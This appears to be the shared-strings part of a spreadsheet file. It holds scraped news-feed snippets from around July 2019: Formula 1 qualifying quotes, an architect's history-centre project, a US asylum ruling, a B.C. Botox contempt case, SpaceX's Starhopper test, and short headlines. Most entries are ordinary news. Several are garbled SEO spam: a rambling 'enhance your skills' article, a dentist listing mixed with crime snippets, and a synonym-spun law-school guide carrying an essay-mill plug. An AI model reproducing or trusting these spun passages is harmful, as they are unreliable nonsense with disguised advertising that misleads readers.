    <t>Kimi Räikkönen was pleased to qualify fifth for Sunday’s German Grand Prix but the veteran Finn knows points are only paid out on race day. The Alfa Romeo Racing driver was the best of the rest behind the two Mercedes AMG Motorsport and two Red Bull Racing drivers at the Hockenheimring, with Räikkönen the first of those to capitalise on the problems for his former team Scuderia Ferrari. The fifth-place result also gave the Hinwil-based team their best Qualifying result since the 2013 United States Grand Prix. Räikkönen felt an even better result was possible in Qualifying, with his lap time from Q2 slightly quicker than he achieved in Q3, which would have put him ahead of Red Bull’s Pierre Gasly in the final reckoning. “Qualifying in fifth makes me happy but it’s only qualifying, the race is tomorrow,” admitted Räikkönen. “We made a few gains through other people’s misfortunes, but in the end we still had to put in the laps when it counted and we did. “The car has been pretty good today and I think we could have been a bit faster in Q3: maybe fourth place was within reach, but that’s racing.” Räikkönen says it is difficult to know whether Alfa Romeo has the pace to be a factor on Sunday, but a lot will depend on the weather conditions that present themselves, with rain forecasted for the race. “It’s very difficult to read into our race pace from yesterday as the conditions have changed a lot and could be even different tomorrow,” said the Finn. “We have to see if the rain comes and figure out the weather the best we can. “It will be hard to race against the big teams; we’ll just take today’s result as it is, give everything tomorrow and see where we end up.” Team-mate Antonio Giovinazzi will start the race in eleventh after missing out on joining Räikkönen in Q3 by just 0.010 seconds, but the Italian remains confident that he can move forward and secure only his second top ten result of the season on Sunday. “It was a bit frustrating to miss out on Q3 for just a hundredth of a second,” said Giovinazzi. “We start from just outside the top ten, but tomorrow is the important day and I am confident we can get to the points. “We wanted more but if we have a good start and a good strategy we can be in that fight. Nobody can predict what weather we’ll have tomorrow and if it starts to rain anything can happen. Having both cars in the top ten is the objective but the key is to continue moving forward.” Team Principal Frédéric Vasseur was pleased with the Qualifying performance from the team but like his lead driver Räikkönen, he knows points are only paid out on Sunday, so the focus must remain on performing when it matters on race day. “Placing a car on the third row is a positive result but points are not given on Saturday, so we still need to focus on our job,” insisted Vasseur. “We have looked competitive all weekend so far and we are pleased with today’s result. “Kimi looked quick from Q1 and delivered a good lap in his only attempt in Q3. It was a pity Antonio missed out on the top ten for such a small margin, but he’s still in a good position to have a strong race. “The weather will be a big variable tomorrow: finding the right strategy will be crucial especially should the rain come.”</t>
  </si>
  <si>
    <t>Warwickshire: Standard or Superior Room for Two with Breakfast, Dinner and Option for Wine at 4* Billesley Manor Hotel The post Warwickshire: Standard or Superior Room for Two with Breakfast, Dinner and Option for Wine at 4* Billesley Manor Hotel appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Wearing the same dark blue jacket he was arrested in on Wednesday, Mr Fitzgerald showed no emotion as he was brought into the dock at Burwood Local Court.</t>
  </si>
  <si>
    <t>“Canberra needs to have a long, hard look at itself and how it allowed this to unfold in recent years," the former PM said.</t>
  </si>
  <si>
    <t>Facebook wants to work with Australia's regulators to help build a better internet, writes its head of global policy and communications.</t>
  </si>
  <si>
    <t>Fines follow series of accounting scandals symbolised by Carillion collapseFines against accountants more than doubled to a record £32m last year as the regulator cracked down on auditors in an attempt to repair its reputation in the wake of Carillion’s controversial collapse.The penalties imposed mark a significant rise from the £13m in fines handed out by the Financial Reporting Council over the 2017-18 financial year. Continue reading… Read More</t>
  </si>
  <si>
    <t>Rhyce Shaw had an interview for the vacant position on Monday as part of a recruitment process that began as soon as Brad Scott finished up.</t>
  </si>
  <si>
    <t>Freshly cleared by border security and navigating LA airport, my phone pinged. It was midnight in Australia but someone was lurking outside my home. The alert came from my internet-connected doorbell and, thankfully, let me log in and see the intruder.</t>
  </si>
  <si>
    <t>Facebook and Google face greater scrutiny of their market dominance, use of consumer data and impact on traditional media.</t>
  </si>
  <si>
    <t>Meanwhile, Cook admits the couple’s friends knew the writing was on the wall for their marriage long before they split. See full article at Film-news.co.uk » The post Rachael Leigh Cook is waiting to tell kids about mum and dad's split appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Christopher Lombardo</t>
  </si>
  <si>
    <t>The Toronto-area pizza QSR is updating its look and store design to give it a "handcrafted" feel. Read More</t>
  </si>
  <si>
    <t>Rachel Clun</t>
  </si>
  <si>
    <t>Experts remain divided on whether cardiac surgery should be performed at just one hospital instead of two.</t>
  </si>
  <si>
    <t>SHELTER ISLAND, N.Y. — As the founding design partner of Kohn Pedersen Fox Associates, William Pedersen is best known for soaring skyscrapers like the World Financial Center in Shanghai or sprawling developments like the recently completed Hudson Yards in New York. But in Mr. Pedersen’s more than 60 years of architectural practice, the project that means the most is the modest one he just completed here, where he and his wife, Elizabeth Pedersen, have summered since 1975. “I probably had the most pleasurable professional experience of my life,” Mr. Pedersen, still lithe at 81, said during a recent walk through the Shelter Island History Center. The center is the new name for the reconfigured complex run by the Shelter Island Historical Society, custodian of the island’s archives and artifacts. Until recently, those treasures were housed in the attic of the historical society’s decaying Havens House Museum, built in 1743. Despite a slight update in 1966, the museum was desperately in need of rescue. “It was a tinderbox waiting for a match,” said Nanette Lawrenson, the historical society’s executive director. Over the last three years, Havens House has been renovated and expanded with a two-level addition designed by Mr. Pedersen to create more storage and a proper art gallery. (A barn on the property, built in 1988, has remained intact). The effort was initiated by Ms. Pedersen, who served for eight years as the historical society’s president. Four years ago, she received a diagnosis of pancreatic cancer, just as the project was gaining steam. Ms. Pedersen continued to be actively involved until her illness made that unfeasible; her husband has finished it for her. “It was through her determination to make this possible that it happened,” Mr. Pedersen said. “And once one gets excited about it, it has a momentum of its own.” The entire undertaking was very much a product of the Pedersens’ personal partnership. Their 50th wedding anniversary gift to each other was a construction assessment of the building. They donated 90 percent of the project’s approximately $6 million cost (the rest was raised from more than 400 contributors), and Mr. Pedersen gave his architectural services for free. “You can’t imagine how much this meant to us — the timing of it, in terms of our own relationship,” he said. “It was such a shared thing.” Ms. Pedersen was inspired by the example of her father, Hiram E. Essex, the director of physiology at the Mayo Institute of Experimental Medicine. Dr. Essex helped found an art center in Rochester, Minn., and donated his family’s 325-acre farm — where he raised purebred Holstein-Friesian cattle — to that city so it could become a public park. “Elizabeth was quite determined to do something like her father did for her community,” Mr. Pedersen said. “So, she did.” The project proved more challenging than anticipated. To ensure that the addition did not overwhelm or upstage the original Havens House building — which over time has served as a home, tavern, school and boardinghouse — Mr. Pedersen decided to locate half of the center below ground level. “We did not want to build a structure that was of equivalent size,” he said. “We wanted something that was lower and would allow this to always remain the dominant player in the composition.” Because of the water level below ground, it was necessary to dig down about 18 feet to achieve a ceiling height in the new building that would be adequate for museum display. “We had to pump water out for three months to make all of this happen,” he said, “sort of like building the Brooklyn Bridge.” The new building, which doubles the original space to about 4,000 square feet, includes an art gallery, which opened June 23 with a show by Alan Shields, a longtime island resident who died in 2005. Shelter Island has long attracted artists — like John Chamberlain, who made his scrap-metal sculptures there, and the violinist Itzhak Perlman, who with his wife, Toby, established the Perlman Music Program — and the historical society hopes the center will become a cultural destination on Long Island’s East End. “It’s a place for people to gather and see art and historical exhibits,” Ms. Lawrenson said, “a way for people to enjoy a Shelter Island story.” The project was very much a local endeavor. The landscape architecture was done by David Kamp, who used to live on the island and volunteered his services. The builder was Fokine Construction, whose principal, Christian Fokine, also makes cheese that he sells at the farmer’s market held outside the history center on Saturday mornings. Mr. Fokine’s wife, Heidi Fokine, has long taught a weekly yoga class in the historical society’s barn. Roz Dimon, a Shelter Island artist, created an interactive installation for the center — “DIMONscape” — which layers 300 years of Havens House’s history into a single artwork. The historical society’s collection of 100,000 documents and objects — including correspondence, news articles, photographs and maps — now resides in new climate-controlled spaces. The artist Helena Hernmarck has created a tapestry for the new center that is based on one of the society’s prized artifacts: a 1652 owners contract for the purchase of Shelter Island between the Manhanset people and English settlers. The building includes a meeting room featuring the original oak beams, which had been covered by plaster and are each marked by Roman numerals that were historically carved in to help with assembly. The courtyard is bordered by Pennsylvania wall stone, where visitors are encouraged to linger. Maxim Velcovsky, a Czech designer, made the glass light fixture in the art gallery; Mr. Pedersen designed the display tables. Understanding the surrounding landscape typically takes time for an architect. But Shelter Island was in Mr. Pedersen’s bones, given his many years on the island — the salty sea air, the tall beach grass, the sand beneath the osprey nests. He didn’t need to be told to redirect the driveway to protect the dawn redwood on the property, for example, one of only three such trees on the island. After renovating two different houses on North Cartwright Road, which now belong to his two grown daughters, Mr. Pedersen designed a contemporary home on Ram Island Drive, where he and his wife have resided for the last decade. “I like to think it’s always been my thing — whether it’s my house or a high-rise in Hong Kong,” Mr. Pedersen said, referring to a building’s sensitivity to the landscape and taking an understated architectural approach. “It’s kind of fun to do that. Maybe I should have done it earlier — to temper one’s aspirations.” With this restraint in mind, Mr. Pedersen said he designed the new history center structure as “a mediating piece” between Havens House and the barn. “The relationship between the two structures had to be one that was totally sympathetic,” he said. “This wasn’t an issue of me doing an avant-garde structure, to proclaim my creativity. The intention was to do something that totally knit this together and, frankly, something that people liked.” Unfortunately, Ms. Pedersen never got to see the center open to the public. She died last Thursday, just four days after the historical society’s annual “Black and White” fund-raiser, held under tents on the property, where she used to preside. Ms. Pedersen left in her will a gift for the center’s education program that is to be called the Elizabeth Pedersen Educational Fund. “The percentage of people who make it four years is about 10 percent,” Mr. Pedersen said of those with metastasized pancreatic cancer, “and we’re very grateful.” That said, “it would have been nice if she could have lasted a little longer,” he added, surveying the four Chinese Elms that shade the courtyard — “to see more of this in action.” Source link</t>
  </si>
  <si>
    <t>England's High Court holds that the teenager's right to privacy, and his own mental wellbeing, are more important than the public's right to know his name.</t>
  </si>
  <si>
    <t>A South Australian Supreme Court judge will resign from the court to become SA's new chief prosecutor.</t>
  </si>
  <si>
    <t>7.37am 22nd July 2019 – Sponsorship – This story was updated on Monday, July 22nd, 2019 US grip brand SwitchGrips has announced a long-term partnership with World Golf Hall of Famer Ernie Els. The 49-year-old four-time Major winner has long been an advocate and user of SwitchGrips. “It’s great for me to be able to properly formalise my relationship with SwitchGrips,” says Els, “I look forward to being able to spread the word and help introduce these game-changing grips to an international audience.” Ernie Els SwitchGrips, founded by Eddie Rogacki, won the award for Best New Product at the PGA Show in 2015. Since that time, the brand has expanded into a full product line of adjustable counterbalanced swing and putter grips. “The beauty of the SwitchGrips product is that it’s so simple,” said Els. “We all know the vagaries of golf. Sometimes you need a new look or feel with your clubs, just to change things up a bit. This product allows golfers to do exactly that; to experiment themselves with different weights. It’s a brilliant solution and the quality is top-notch. Once golfers know about this product, there’s no going back. SwitchGrips are the only grips you’ll want on your clubs.” SwitchGrips founder and CEO Eddie Rogacki commented: “We’ve really enjoyed working with Ernie these past few years and have developed a good relationship. We know Ernie would not lend his name to a product that he doesn’t love or believe in, so when it came to the selection of a global ambassador for our fast-growing brand, Ernie was a natural fit. Ernie is one of the game’s true legends, respected and admired all around the world. We’re honoured to have him officially on board and look forward to working together in the years to come.” For more information on SwitchGrips, visit www.switchgripsusa.com or www.switchgripssa.co.za. Source link</t>
  </si>
  <si>
    <t>ETIHAD AIRLINES is one of the most popular carriers offering long-haul flights from the UK overseas. Yet are Britons afforded free hand luggage – and what are the stipulations? Daily Express :: Travel Feed</t>
  </si>
  <si>
    <t>A HOUSING estate on Willow Vale’s northern boundary is dragging the suburb’s median price down.</t>
  </si>
  <si>
    <t>Japan travel video The post Japan travel video appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Russia denies its warplanes targeted a market and residential areas in Maarat al-Numan. The post Syria war: Air strikes on town in rebel-held Idlib ‘kill 31’ appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>A two-qubit gate is the central building block of any quantum computer. The UNSW team’s version of the gate is said to be the fastest that’s ever been demonstrated in silicon, completing an operation in 0.8 ns — around 200 times faster than other existing spin-based two-qubit gates. The group approached the two-qubit gate as an operation between two electron spins, comparable to the role that classical logic gates play in conventional electronics. The team was able to build the gate by placing two atom qubits closer together than ever before, and then — in real time — controllably observing and measuring their spin states. The team’s approach to quantum computing requires not only the placement of individual atom qubits in silicon but all the associated circuitry to initialise, control and read out the qubits at the nanoscale — a concept that requires such precision it was long thought to be impossible. But with this major milestone, the team is now positioned to translate their technology into scalable processors. “Atom qubits hold the world record for the longest coherence times of a qubit in silicon with the highest fidelities,” said Prof Simmons, Director of the Centre of Excellence for Quantum Computation and Communication Technology (CQC2T) and founder of Silicon Quantum Computing. “Using our unique fabrication technologies, we have already demonstrated the ability to read and initialise single electron spins on atom qubits in silicon with very high accuracy. We’ve also demonstrated that our atomic-scale circuitry has the lowest electrical noise of any system yet devised to connect to a semiconductor qubit. “Optimising every aspect of the device design with atomic precision has now allowed us to build a really fast, highly accurate two-qubit gate, which is the fundamental building block of a scalable, silicon-based quantum computer.” The atomically engineered two-qubit gate. The researchers not only brought the qubits closer together since their last breakthrough — just 13 nm apart — they also engineered all the control circuitry with sub-nanometre precision. Using a scanning tunnelling microscope to precision-place and encapsulate phosphorus atoms in silicon, the team first had to work out the optimal distance between two qubits to enable the crucial operation. As explained by CQC2T’s Dr Sam Gorman, lead co-author on the study, “Our fabrication technique allows us to place the qubits exactly where we want them. This allows us to engineer our two-qubit gate to be as fast as possible. “Not only have we brought the qubits closer together since our last breakthrough, but we have learnt to control every aspect of the device design with sub-nanometre precision to maintain the high fidelities.” The team was then able to measure how the qubits’ states evolved in real time. Most excitingly, the researchers showed how to control the interaction strength between two electrons on the nanosecond timescale. “Importantly, we were able to bring the qubits’ electrons closer or further apart, effectively turning on and off the interaction between them — a prerequisite for a quantum gate,” said lead co-author Dr Yu He. “The tight confinement of the qubits’ electrons, unique to our approach, and the inherently low noise in our system enabled us to demonstrate the fastest two-qubit gate in silicon to date. “The quantum gate we demonstrated, the so-called SWAP gate, is also ideally suited to shuttle quantum information between qubits and, when combined with a single-qubit gate, allows you to run any quantum algorithm.” Prof Simmons said the breakthrough is a “massive advance” and the culmination of two decades’ worth of work. “To be able to control nature at its very smallest level so that we can create interactions between two atoms but also individually talk to each one without disturbing the other is incredible,” she said. “A lot of people thought this would not be possible. “The promise has always been that if we could control the qubit world at this scale, they would be fast, and they sure are!” UNSW Science Dean Professor Emma Johnston AO added that the paper shows just how groundbreaking Prof Simmons’ research is. “This was one of Michelle’s team’s final milestones to demonstrate that they can actually make a quantum computer using atom qubits,” she said. “Their next major goal is building a 10-qubit quantum integrated circuit — and we hope they reach that within 3–4 years.” Top image caption: Dr Joris Keizer, Professor Michelle Simmons and Dr Yu He at CQC2T. Please follow us and share on Twitter and Facebook. You can also subscribe for FREE to our weekly newsletter and bimonthly magazine.</t>
  </si>
  <si>
    <t>Why is everyone thinking that this may be the major redesign iPhone year? If Apple were to continue the tradition, 2019 iPhone 11 will fe... The 2020 iPhone</t>
  </si>
  <si>
    <t>submitted by /u/smallindianboi [link] [comments] Applications That Will Utilize iPadOS Towards A Greater Potential For Designers</t>
  </si>
  <si>
    <t>Felicia Spencer faces Cris Cyborg in the co-main event of the UFC 240 pay-per-view event, which takes place Saturday at Rogers Place in Edmonton, Alberta, Canada. Source: Sports Business News</t>
  </si>
  <si>
    <t>Most Popular Dentist Near Airdrie Top Dentist In Airdrie See here the whole list of our best Dentists from Airdrie and their surroundings reviewed by StarOfService community from Calgary – Alberta. Do you want to know who is in the top. Most Popular Dental Clinic Below is a list of all Dentist in Airdrie, Alberta, Canada. Did not find your agency on the list? You can add your Dentist through the form in the top right corner of the. Saw Doctor Patel to give my 4 pound Chihuahua her first shots, he was very kind, and gentle with. Full information about Blunston Dental Group in Airdrie, 1, 620 1 Ave NW, Airdrie, AB T4B 2R3, Canada, Address, telephone number, fax, postal code, website addres, work. Company description: Cusp Dental Care is a Canadian Dentist based in Airdrie, Alberta. Cusp Dental Care is located at 3 Stonegate Dr NW, Airdrie, AB T4B 0N2, Canada, Please contact Cusp Dental Care using information below: Address, Phone number, Fax. Airdrie bust leads to drug and weapons charges – Airdrie RCMP have charged a man and woman from. A vehicle was searched on July 21, where police seized a number of items, Find the best Dentist in Airdrie, AB. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local. A recent article analysed the growth in the number of dental colleges and its effect on dentists and the dental care system. Preferred Dentist Near Airdrie on the scoresheet at Airdrie – are ineligible for the visit of the Wee Rangers. Investigators say they recognized signs of strangulation "on the victim's neck" but found no ligature or cord near the bed, and that "after a. Dentistry in a ‘state of crisis’, says report – A series on oral health in a medical journal has raised concern over the increase in number of dental schools. .</t>
  </si>
  <si>
    <t>A Tayside woman has been so touched by the plight of people in the refugee camp at Moria on the Greek island of Lesbos that she has gathered a huge array of clothing to be sent to them in a 40-foot container.</t>
  </si>
  <si>
    <t>After years of underperformance, Australian stocks have finally managed to hit fresh peaks. But how much further can they run?</t>
  </si>
  <si>
    <t>Australian researchers have revealed the genetic structure of the influenza virus and say it could help predict a future pandemic.</t>
  </si>
  <si>
    <t>Five transfer targets who could help Arsenal salvage the summer window. Source: Sports Business News</t>
  </si>
  <si>
    <t>zorem</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V How to Connect to your WooCommerce Store to get automated Shipment Status updates to your orders. source</t>
  </si>
  <si>
    <t>A federal judge in the United States on Wednesday blocked the Trump administration from enforcing new asylum restrictions for immigrants at the US-Mexico border, marking the latest defeat for a president waging an all-out battle in the courts to stop the flow of migrants into the country. The ruling by US District Judge Jon Tigar in San Francisco came hours after a judge in Washington decided to let the rules stand. The California ruling halts the policy across the border as lawsuits play out in court. The new asylum rules would prevent most migrants at the southern border from seeking asylum in the US if they passed through another country first. Most of the immigrants crossing the border are from Central America, making most of them ineligible for asylum because they passed through Mexico. It also would affect asylum seekers from Africa, Asia and South America who arrive regularly at the southern border. The restrictions went into effect last week, though there were conflicting reports on whether US immigration agencies were actually enforcing it. Top US officials say their plan would discourage migrants from leaving their countries, which they say is necessary to reduce the numbers of people that border agents are detaining. Tigar, who was appointed by former President Barack Obama, has already barred less restrictive asylum policies from taking effect and could permanently block the new asylum policy. The judge said the new policy could expose migrants to violence and abuse, deny their rights under international law and return them to countries they were fleeing. He acknowledged that the country’s immigration system is overwhelmed by the surge in migrants from Central America over the last year. “But shortcutting the law, or weakening the boundary between Congress and the Executive, are not the solutions to these problems,” Tigar said. The Justice and Homeland Security Departments did not immediately respond to requests for comment. President Donald Trump told reporters before his departure for a fundraiser in West Virginia that the Washington decision was a “tremendous ruling.” He added: “We appreciate it. We respect the courts very much. That helps us very much at the border.” The policy has exceptions that would still allow a migrant to apply for US asylum: If someone has been trafficked, if an asylum seeker sought protection in a country but was denied or if the country the migrant passed through did not sign one of the major international treaties that govern how refugees are managed – though most Western countries have signed them. Meanwhile, tens of thousands of people are waiting in Mexico on official and unofficial lists formed after US agents started turning away many asylum seekers, citing lack of space and delays in immigration courts. Federal courts have prevented other Trump administration plans from taking effect, including a ban on asylum for anyone who crosses the southern border illegally. A federal court also stopped the administration from detaining asylum seekers without giving them a chance to be released on bond. Source link</t>
  </si>
  <si>
    <t>Jackson Lavell-Lee</t>
  </si>
  <si>
    <t>The Augusta Margaret River Hawks have come from behind to beat the Eaton Boomers by three points 12.9 – 81 to 12.12 – 84 at Glen Huon Reserve on Sunday.</t>
  </si>
  <si>
    <t>Team Principal for Alfa Romeo Racing, Frédéric Vasseur, has recognised how close the midfield teams have become in recent races this season, and how small margins can make the difference between a good and a bad race, stating: “how each race’s fortunes can be decided by very small but crucial factors”. “The last three races have highlighted how close the midfield is and how each race’s fortunes can be decided by very small but crucial factors. We have scored in each of the last few rounds, which is positive, but we need to keep working hard to produce similar results in the final two races before the summer break.” he said. He added: “I believe we are heading in the right direction and I have full confidence in the work that our people are doing, both trackside and back at HQ.” The team have improved on their performance in the last few races, compared to where they were at the start of the season, scoring points at Circuit Paul Ricard, the Red Bull Ring and Silverstone. The team are also taking the opportunity to pay tribute to Beat Zenher this weekend, their Team Manager, who joined the sport 25 years ago. “The strength of this team is its people and we are well equipped to take on this challenge: in this regard, nobody embodies the spirit of our team more than Beat Zehnder. I wish to congratulate him on his 25 years as a team manager and I hope he will enjoy plenty more success with us going forward,” said Vassuer. Drivers Kimi Räikkönen and Antonio Giovinazzi will want to keep up this form for the next couple of races, finishing in the points in Germany and Hungary, ahead of the summer break. The season resumes in Belgium at Spa-Francorchamps on September 1.</t>
  </si>
  <si>
    <t>New Ideas Into How to Enhance Your Skills Never Before Revealed When you have a look at the best leaders, among the traits they possess, is the capacity to communicate effectively, which underscores the value of communication abilities. Knowing the association between your computer (including your regional development environment) and the web, together with how to communicate between them both, is important for each and every developer. Understanding crystal reports software is getting more pertinent to some employers and you might have to undergo a collection of crystal reports training. Everybody has strengths and weaknesses in several regions of internet advertising. The world wide web is getting a closely knighted community, and you can’t afford to tarnish your good reputation. In today’s time, it is a very important tool for the success of your online business. More individuals are beginning to become involved in internet jobs since they are more convenient and the internet payment methods have been shown to be safe. Otherwise, then you ought to attempt to find them online. There are lots of websites where you’re able to learn how to code completely free. The processes performed on a daily basis should permit a business to produce the absolute most out of every characteristic of their objective. Utilizing the right layout may also be a great way to convey your professionalism and place you apart from other applicants. Adapting to the different teaching methods utilized by different experts will take some time but that being said, it’s well worth it when you are aware that you’re being guided by true professionals. It is essential to pursue the course based on your interest. Ensure on finishing the course you’re work ready for an Australian expert placement. To boost your chances at success, aim to have the ability to demonstrate to a possible employer which you have promoted your professional development from day one. http://cienciaycaza.es/ Training will help to raise your knowledge that will enable you to advance your career. Classes are found at costs far below 500, but one should be cautious about going into something which isn’t going to offer you the skills that are necessary to be a fantastic instructor. Most certification courses involve no less than a 200-hour training plan. What the In-Crowd Won’t Tell You About How to Enhance Your Skills Demo classes will also help you pick the program, which will provide you with a fantastic career ahead. Whether you’re a beginner, or you currently have some skills, Microsoft Excel is an extremely valuable tool to master. Program Exploration It’s wise to learn more about the program and all it entails before you enroll. The Secret to How to Enhance Your Skills If you’re on the area of education, or whether you are extremely knowledgeable about a specific language then you can do tutorials for an hourly basis. Identify what it is which you enjoy about their work, and see whether you can use it in order to increase your writing skills. The training course can be found in various languages. There is likewise the odds of you being unable to select a desired central city like Tokyo or Osaka. In a bid to aim for excellence, the best idea may be to employ an expert to edit your essay. If you would rather have a more comprehensive component on the ideal approach to deal with GAMSAT essays, see the internet link below in which you’re likely to receive it free. Identifying and defining operational risk will turn into much easier. The programmes not only include things like conservation measures necessary to maintain aged buildings, they also incorporate the innovative procedures necessary to sustain new constructions, like tunnels, pavements and parks. Profound skills in object oriented programming enable a developer be better at any sort of framework. You ought to be passionate about what you’re doing in order to totally concentrate on the task given and not get tired of it. Constantly recalling information as a way to aid the learning of another person is a potent way to boost your learning. Helping others is the ideal approach to sharpen your abilities. Concentrate and letting it rip is what you need to do. You are going to be watching Sass files automatically for any new adjustments and exporting in actual moment. You ought to be in a position to define problems in order to discover solutions. The track day organizing company will help you locate the track day that’s nice and reliable to you. It’s both important and rewarding to continue to come up with your abilities and move forward, but when you’re very busy it isn’t always simple to acquire the head room to consider things properly. You may even find nothing after attempting to dig a number of region of land. So as to have a fantastic swing, you cannot merely use just part of your entire body but you have to understand how to employ your entire body to have that highly effective golf swing. Despite the fact that online learning might not be for everybody, the pros far outweigh the cons. Being a pro billiard player will definitely open a great deal of chances for you.</t>
  </si>
  <si>
    <t>RV trip The post RV trip appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Vancouver: The regulatory body that governs all British Columbia doctors says a woman who once advertised herself as “Dr. LipJob” is now serving consecutive 30-day sentences for defying a court order prohibiting her from injecting Botox and dermal fillers. The College of Physicians and Surgeons of B.C. says in a news release that Abbotsford resident Rajdeep Kaur Khakh was handed the two sentences when she appeared in B.C. Supreme Court in Vancouver earlier this month. In January, Khakh was found in contempt for violating an earlier injunction ordering her not to use the term doctor and not to practice medicine by administering injectables. That 30-day sentence was suspended on the condition she abide by the ruling, but the college says a month later it learned Khakh had again injected Botox and it sought an order of civil contempt. In a July 12 ruling, Justice Nitya Iyer lifted the earlier suspension, ordered a 30-day sentence to be followed by a second 30-day term and also imposed fines of $7,500, on top of a $5,300 fine set during the court appearance in January. Graeme Keirstead, the lawyer who represented the college, says the regulatory body hopes the sentence and fines will send a strong message. “For Ms. Khakh to have disobeyed a court order not once but twice is extraordinary,” Keirstead says in the release. “It appears clear that her ladyship found this level of contempt to be worthy of significant punishment.” Khakh was taken into custody at the conclusion of the July 12 hearing and is serving her sentence at Alouette Correctional Centre for Women in Maple Ridge. Khakh first drew the college’s attention in March 2015 when it says it learned a woman was calling herself a doctor and was injecting Botox or dermal fillers at a spa in Delta. During the investigation that followed, the college says it confirmed Khakh was using an altered photocopy of a College Certificate of Licensure to convince spas and medical suppliers that she had a medical licence and was certified to practice in British Columbia. Despite numerous phone, email and mail contacts with Khakh from early 2015 to mid-2016 plus her signature on two, separate undertakings pledging not to practice medicine or administer Botox or fillers, the college says it received further complaints about her in 2017. “The College is advised that “Dr. Rajji” markets herself on social media as “Dr. Lip Job.” It is determined that “Dr. Rajji” is in fact Ms. Khakh,” says a college release dated June 14, 2017. The tips prompted a two-month investigation and in October 2017, the college filed its first application in B.C. Supreme Court for a permanent injunction to halt Khakh’s activities. Only health professionals who are licensed and registered, and eligible under their scope of practice, are authorized to inject Botox and dermal fillers, says the college. It “strongly advises” anyone who has received Botox or dermal filler injections by an unlicensed practitioner to speak with their doctor and review the treatment to ensure there are no complications. The Canadian Press</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/7/26/8897487/spacex-starship-starhopper-hover-test-deep-space SpaceX’s new test rocket briefly hovers during first free flight SpaceX’s Starhopper the day before its first flight | Image: SpaceX Late on Thursday, July 25th, SpaceX launched a test version of its next big rocket from Texas, sending the vehicle hovering in the air for a few seconds before it landed back on the ground. The hardware didn’t get very high, but it was the first time the test vehicle flew detached from the ground, powered by SpaceX’s next-generation rocket engine. The vehicle is a test prototype of SpaceX’s future, Starship rocket. Starship is the company’s most ambitious vehicle concept yet: it’s a fully reusable design intended to send cargo and people to deep space destinations like the Moon and Mars. Similar to SpaceX’s Falcon 9 rockets, Starship is supposed to land upright — on Earth or on distant worlds — and then be able to take off again. S… Continue reading… Source: https://www.theverge.com/2019/7/26/8897487/spacex-starship-starhopper-hover-test-deep-space The post SpaceX’s new test rocket briefly hovers during first free flight appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Trump’s target in a series of early morning tweets was U.S. Rep. Elijah Cummings, Democratic chairman of the House of Representatives oversight committee, who has called Trump a racist and sharply criticized his immigration policies. CBC | World News</t>
  </si>
  <si>
    <t>Early on Tuesday morning, the Oklahoma City Thunder unveiled a much anticipated 2019-20 Nike uniform kit headlined by their City Edition uniform in alignment with the anniversary of the April 19, 1995 bombing of the Alfred P. Murrah Federal Building in downtown Oklahoma City. Source: Sports Business News</t>
  </si>
  <si>
    <t>Guide: How Exactly To Connect With Law Class Youth may be the time to select. Select your pastime, choose just what is interesting for you personally, select buddies and institution that is educational. College or college can explain to you a path that is new where you will definitely learn things, deepen your understanding in order to find the work of the ambitions! Needless to say, it’s not a challenge that is one-minute reveal the game you will end up involved with, however it is an important procedure of adulting. Numerous pupils have already appear aided by the notion of their future career prospect – they find the course of assisting individuals solve dilemmas and protect legal legal rights – they chose to be solicitors. The street to become a expert attorney is bumpy and tricky. But every thing begins having a statutory legislation school application. If you are planning to connect with this kind of academic organization, we ready informative guide. Those steps that are simple allow you to beat anxiety and gain self- self- confidence in your admission! Experiencing essay research? Our article writers have already aided 2,000+ students conquer their homework objectives. Allow them to allow you to. Study additionally: how exactly to calculate GPA for college at EduBirdie? How exactly to Apply: Procedures and Guidance Any task is impractical to implement without the right preparation. Exactly the same is by using application to a academic organization. The program can help you never to miss any such thing crucial. Simply take your yellowish appropriate pad and outline what exactly you should do to in series. Basic steps below will help you build plan. Consult advisor that is pre-law. This individual can let you know a great deal about planning to legislation college admission make sure application cost, assistance select institution that is academic for you personally and recommend courses for undergraduates. Go ahead and ask any concern, response to that you desired to understand. Use the LSAT. This task now is easier than it seems. You begin with registering your bank account on the site of law college admission council. Having a page that is individual you can easily keep an eye on the headlines and activities into the sphere and obtain knowledgeable about needs and needs of organizations you are likely to use. The majority of the scholastic organizations need candidates to make the test by December. You won’t make an error if you pass the exam in summer time. It’s better to accomplish it early to get your LSAT ratings over time than keep stressing to fulfill the due date. Seek out choices. This process has got to be conducted completely. See web site of every college, examine information on the academic procedure and count distance between campus along with your home (for you) if it’s necessary. But don’t settle in the one choice: choose at minimum three or even more schools better so that you can involve some variations to pick from. See seminars and discussion boards. Such yearly activities gather nearly all legislation schools and universities. There you are able to dec &gt;$185, you are able to the job procedure more effective and painless. Apply! it is possible is essayshark legit to fill out an application online making use of your LSAC account. The sheer number of schools you may be permitted to affect is unlimited so use every chance! Helpful Methods For Future Law Students Invest some time to check on all information you offer on the LSAC account. Your title along with other individual information need to be stated when you look at the same kind as in id along with other papers. So that you can allow representatives of every organization review your profile and recruit you, produce a merchant account at candidate referral solution. Don’t just forget about individual declaration. It really is a document that is important illustrates your achievements and defines your individuality. Enclose this paper to your electronic application. Listening to your advice we offered you will guarantee yourself effective distribution towards the preferable legislation college!</t>
  </si>
  <si>
